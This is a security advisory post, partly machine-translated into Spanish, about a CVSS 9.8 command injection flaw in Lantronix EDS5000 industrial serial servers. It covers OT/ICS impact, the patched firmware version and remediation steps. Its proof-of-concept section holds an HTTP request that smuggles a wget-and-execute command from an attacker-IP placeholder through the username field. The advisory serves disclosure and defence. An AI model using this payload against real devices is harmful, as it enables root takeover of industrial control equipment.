CVE-2025-67038: Lantronix EDS5000 CVSS 9.8 Code Injection — CISA KEV, ICS/OT Alert, Federal Deadline Today
CISA emite alerta urgente sobre la inyección de código CVSS 9.8 crítica en convertidores de serie industriales Lantronix.
Este post forma parte del Semana del 26 de junio de 2026.
Vulnerability Overview
CVE-2025-67038 es una crítica código de inyección vulnerabilidad (CWE-94) en la serie Lantronix EDS5000 — un convertidor serie-a-Ethernet ampliamente desplegado en entornos de automatización industrial, tecnología operativa (OT) y ICS. CVSS puntuación: 9.8 Crítico. CISA la agregó al catálogo de vulnerabilidades explotadas (KEV) 23 de junio de 2026, con un plazo de remediación de la agencia federal 26 de junio de 2026 (hoy).
CVE: CVE-2025-67038 CVSS: 9.8 Resistente crítica CISA KEV: 23 de junio de 2026 FCEB Deadline: 26 de junio de 2026
Detalles técnicos
El Lantronix EDS5000 es un servidor de dispositivo serie que permite a los equipos industriales conectados en serie (PLCs, sensores, metros, robots) acceder y gestionar a distancia sobre Ethernet. La vulnerabilidad existe en el dispositivo Módulo HTTP RPC: cuando se trata de autenticación, el módulo toma el username parámetro y lo concatena directamente en un comando de shell para registrar eventos de autenticación fallidos — sin ninguna sanitización. Un atacante puede inyectar metacaracters OS en el campo de nombres de usuario para ejecutar comandos de raíz arbitrarios, sin necesidad de credenciales válidas.
Proof-of-Concept Attack
POST /auth HTTP/1.1
Host: <target-ip>
Content-Type: application/x-www-form-urlencoded
username=admin%3Bwget+http%3A%2F%2F<attacker-ip>%2Fshell.sh+-O+%2Ftmp%2Fs%3Bash+%2Ftmp%2Fs%26&password=x
El comando shell injected via the username El parámetro funciona como root, habilitación: descarga y ejecución de las cargas de pago, estableciendo conchas inversas, modificando la configuración del dispositivo para retransmitir el tráfico de atacantes, pivotando a las redes OT/ICS de aire comprimido alcanzables sólo a través de los dispositivos conectados con serie.
OT/ICS Impact
El papel de EDS5000 como puente serie-a-Ethernet hace que esta vulnerabilidad sea particularmente peligrosa en entornos OT. Compromisar un EDS5000 puede dar a los atacantes:
- Mando y control directo sobre PLCs conectados en serie, RTUs y controladores industriales
- Capacidad para manipular lecturas de sensores alimentadas a sistemas SCADA
- Un punto clave en las redes de control con aire
- Potencial para la perturbación del proceso físico en la fabricación, utilidades e infraestructura crítica
CISA señaló específicamente el potencial de "pérdida o negación de control sobre activos industriales o de automatización" mediante la manipulación de dispositivos vulnerables.
Versiones y arreglos afectados
All Lantronix EDS5000 Dispositivos de serie antes de la versión de firmware 2.2.0.0R1. Lantronix lanzó la solución y recomienda actualización inmediata a EDS5000 versión 2.2.0.0R1. Contacto Soporte Lantronix si los mecanismos de actualización automática no están disponibles en su entorno OT.
Remediación
- Aplicar parche inmediatamente: Actualizar a Lantronix EDS5000 versión de firmware 2.2.0.0R1.
- Serie de sesiones de red: Asegurar que las interfaces de gestión EDS5000 no estén expuestas a redes no confiadas. Colocarlos detrás de un firewall o servidor de salto que restringe el acceso a rangos IP confiables solamente.
- Interfaz de gestión HTTP si no es necesario — use SSH o acceso a consola física en su lugar.
- Exposición de inventario: Búsqueda Shodan para
product:"Lantronix EDS5000"para identificar instancias expuestas en Internet en su organización. - Si el parche no es inmediatamente posible en su entorno OT, aislar el dispositivo desde el acceso a la red externa como mitigación de emergencia.
- Monitor for IOCs: Inesperadas conexiones externas, cambios de configuración o entradas de registro de autenticación inusuales en dispositivos EDS5000.
← Volver a la Ronda de Seguridad: Semana del 26 de junio de 2026